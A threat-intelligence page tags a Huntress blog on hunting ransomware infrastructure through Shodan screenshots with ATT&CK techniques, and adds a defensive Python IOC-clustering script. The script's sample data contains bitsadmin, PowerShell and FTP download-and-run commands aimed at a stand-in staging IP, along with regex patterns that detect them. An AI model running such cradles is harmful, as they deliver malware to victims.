TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Using Shodan Images to Hunt Down Ransomware Groups | Huntress

2022-12-20

ATT&CK techniques detected

9 predictions
T1486 Data Encrypted for Impact
94%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. I will show how simplistic and opportunistic some of these attacks/attackers are and where we can hunt them in the wild. Then you will be able to take this information and actively app…”
T1486 Data Encrypted for Impact
93%
“Here is a pitfall for ransomware groups where they end up spamming their payload at any poor device that will listen. Those poor devices. GandCrab campaign: PowerShell & bitsadmin. GandCrab — also known as REvil — has rebranded many times and has had many of its affiliates arrested…”
T1486 Data Encrypted for Impact
85%
“quickly attribute the malware to the group by searching the .exe names and the IP addresses as we are looking at historical data; thankfully it's for a mass campaign. Searching the IP leads us to here https://urlhaus.abuse.ch/host/92.63.197.153/ which tells us th…”
T1585.002 Email Accounts
76%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. I will show how simplistic and opportunistic some of these attacks/attackers are and where we can hunt them in the wild. Then you will be able to take this information and actively app…”
T1080 Taint Shared Content
41%
“Here is a pitfall for ransomware groups where they end up spamming their payload at any poor device that will listen. Those poor devices. GandCrab campaign: PowerShell & bitsadmin. GandCrab — also known as REvil — has rebranded many times and has had many of its affiliates arrested…”
T1197 BITS Jobs
41%
“I have taken an instance where the ransomware group tried to infect a pfSense router with PowerShell, bitsadmin and FTP, and not only was that not enough, but they did it again. Color breakdown: red - first execution; blue - commands and domains; yellow - second execution; green - …”
T1486 Data Encrypted for Impact
39%
“000 potential paydays. Cha-ching. However, one person cannot go through all of these alone, so this is where our threat actor turns to automation … and ultimately leads to their downfall. Leveraging the ability of Shodan images and combining them with the work of a ransomware a…”
T1080 Taint Shared Content
35%
“aspects of the ransomware ecosystems and the assemblage of cybercriminals in this food chain. I will show how simplistic and opportunistic some of these attacks/attackers are and where we can hunt them in the wild. Then you will be able to take this information and actively app…”
T1486 Data Encrypted for Impact
34%
“Using Shodan Images to Hunt Down Ransomware Groups | Huntress. In a couple of blog posts, we'll discuss how we leverage Shodan.io to solve some security problems. In this blog, we're going to focus on how Shodan helps us unveil some of the infrastructure that supports ransomw…”

Summary

In this blog, we’re going to focus on how Shodan helps us unveil some of the infrastructure that supports ransomware actors.
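The pivot the excerpts describe (pulling the .exe names and IP addresses out of what a Shodan screenshot shows, looking the IP up on URLhaus, and recognising the bitsadmin/PowerShell/FTP download cradle that was sprayed at the pfSense box) can be scripted across a batch of hosts so that a mass campaign shows up as a cluster. The block below is an added example written for this page, not code from the Huntress post. It assumes Shodan-style host records that carry OCR'd screenshot text under `opts.screenshot.text` (those field names are an assumption to check against the real API response), and the sample records are constructed with documentation-range IPs rather than real victims or attacker infrastructure.

```python
"""Cluster exposed hosts by the ransomware IOCs visible in Shodan screenshots.

Added example, not code from the Huntress post. Assumptions:
  - Records mimic a Shodan host result with the OCR'd screenshot text under
    opts.screenshot.text; those field names are assumed, verify them against
    the real API response before relying on them.
  - SAMPLE_RECORDS are constructed for this demo (documentation-range IPs),
    not real victims or attacker infrastructure.
"""
import re
from collections import defaultdict

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXE_RE = re.compile(r"\b[\w.-]+\.exe\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)

# The three download cradles the post saw thrown at a pfSense router.
CRADLE_PATTERNS = [
    ("bitsadmin", re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I)),
    ("powershell", re.compile(
        r"\bpowershell(?:\.exe)?\b.*?\b(?:DownloadFile|DownloadString|IEX|"
        r"Invoke-Expression|Invoke-WebRequest)\b", re.I | re.S)),
    ("ftp", re.compile(r"\bftp(?:\.exe)?\s+-s:", re.I)),
]

# Constructed sample data: three devices whose screenshots show the same
# spray-and-pray payload from one staging IP, plus one unrelated login page.
SAMPLE_RECORDS = [
    {"ip_str": "192.0.2.10", "opts": {"screenshot": {"text":
        "C:\\> bitsadmin /transfer job /download /priority high "
        "http://203.0.113.45/update.exe C:\\Windows\\Temp\\update.exe"}}},
    {"ip_str": "192.0.2.11", "opts": {"screenshot": {"text":
        "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
        ".DownloadFile('http://203.0.113.45/update.exe','t.exe')"}}},
    {"ip_str": "192.0.2.12", "opts": {"screenshot": {"text":
        "ftp -s:cmd.txt 203.0.113.45\nstart update.exe"}}},
    {"ip_str": "192.0.2.13", "opts": {"screenshot": {"text":
        "pfSense login\nUsername: Password:"}}},
]


def screenshot_text(record):
    """OCR text of a Shodan-style record (assumed field path); '' if absent."""
    return record.get("opts", {}).get("screenshot", {}).get("text", "")


def extract_iocs(text):
    """IPs, binary names and URLs visible in one screenshot's text."""
    return {
        "ips": set(IPV4_RE.findall(text)),
        "exes": {m.group(0).lower() for m in EXE_RE.finditer(text)},
        "urls": set(URL_RE.findall(text)),
    }


def classify_cradle(text):
    """Name the download cradles present, in CRADLE_PATTERNS order."""
    return [name for name, rx in CRADLE_PATTERNS if rx.search(text)]


def urlhaus_host_url(ip):
    """URLhaus host page for an IP, the same pivot the post uses."""
    return f"https://urlhaus.abuse.ch/host/{ip}/"


def cluster_by_ioc(records):
    """Map 'ip:<addr>' / 'exe:<name>' IOCs to the sorted hosts showing them."""
    clusters = defaultdict(set)
    for rec in records:
        iocs = extract_iocs(screenshot_text(rec))
        for ip in iocs["ips"]:
            clusters[f"ip:{ip}"].add(rec["ip_str"])
        for exe in iocs["exes"]:
            clusters[f"exe:{exe}"].add(rec["ip_str"])
    return {k: sorted(v) for k, v in clusters.items()}


def find_campaigns(records, min_hosts=2):
    """IOCs shared by at least min_hosts hosts, with a URLhaus pivot for IPs.

    A binary name or staging IP seen on several unrelated victims is the
    signature of the automated spray the post describes."""
    result = {}
    for ioc, hosts in cluster_by_ioc(records).items():
        if len(hosts) < min_hosts:
            continue
        kind, value = ioc.split(":", 1)
        result[ioc] = {
            "hosts": hosts,
            "pivot": urlhaus_host_url(value) if kind == "ip" else None,
        }
    return result


if __name__ == "__main__":
    for ioc, info in find_campaigns(SAMPLE_RECORDS).items():
        print(ioc, info)
    for rec in SAMPLE_RECORDS:
        print(rec["ip_str"], classify_cradle(screenshot_text(rec)))
```

Nothing here touches the network: the script only builds the URLhaus host URL for an analyst to open, and the cradle patterns are deliberately narrow (a `/transfer` job, a PowerShell download primitive, an `ftp -s:` script) so that ordinary banners do not cluster with the payload hosts.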